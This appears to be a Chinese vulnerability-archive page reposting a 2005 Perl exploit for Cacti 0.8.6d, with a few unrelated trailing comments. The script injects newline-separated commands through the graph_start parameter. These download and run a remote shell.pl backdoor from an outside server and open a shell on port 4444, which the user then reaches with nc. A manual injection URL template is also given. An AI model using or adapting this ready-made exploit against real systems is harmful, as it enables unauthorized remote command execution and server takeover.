Cacti 0.8.6d – Remote Command Execution
漏洞ID | 1055179 | 漏洞类型 | |
发布时间 | 2005-06-22 | 更新时间 | 2005-06-22 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Note:
# This exploit contains backdoor shell code that is not located on this server.
# /str0ke
#!/usr/bin/perl
#
# Remote Command Execution Exploit for Cacti <= 0.8.6d
#
# This exploit open a remote shell on the targets that uses Cacti
# TARGET HOST MUST BE A GNU/LINUX SERVER, if not:
# manual exploiting --> http://www.example.com/cacti/graph_image.php?local_graph_id=[valid_value]&graph_start=%0a[command]%0a
# Patch: download the last version http://www.cacti.net/download_cacti.php
# Discovered and Coded by Alberto Trivero
use LWP::Simple;
print "nt===============================n";
print "t= Exploit for Cacti <= 0.8.6d =n";
print "t= by Alberto Trivero =n";
print "t===============================nn";
if(@ARGV<2 or !($ARGV[1]=~m///)) {
print "Usage:nperl $0 [target] [path]nnExamples:nperl $0 www.example.com /cacti/n";
exit(0);
}
$page=get("http://".$ARGV[0].$ARGV[1]."graph_view.php?action=list") || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]n";
$page=~m/local_graph_id=(.*?)&/ || die "[-] Unable to retrieve a value for local_graph_id";
print "[~] Sending exploiting request, wait for some seconds/minutes...n";
get("http://".$ARGV[0].$ARGV[1]."graph_image.php?local_graph_id=$1&graph_start=%0acd /tmp;wget http://server/shell.pl;chmod 777 shell.pl;perl shell.pl%0a");
print "[+] Exploiting request done!n";
print "[*] Now try on your box: nc -v $ARGV[0] 4444n";
# milw0rm.com [2005-06-22]
ThatwareSQL注入漏洞 漏洞ID 1203322 漏洞类型 SQL注入 发布时间 2002-12-31 更新时间 2002-12-31 CVE编号 CVE-2002-2252 CNNVD-ID CNNVD-200212-504 漏洞平台 N/A CVS…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛8月前0
kankan啊啊啊啊3年前0
66666666666666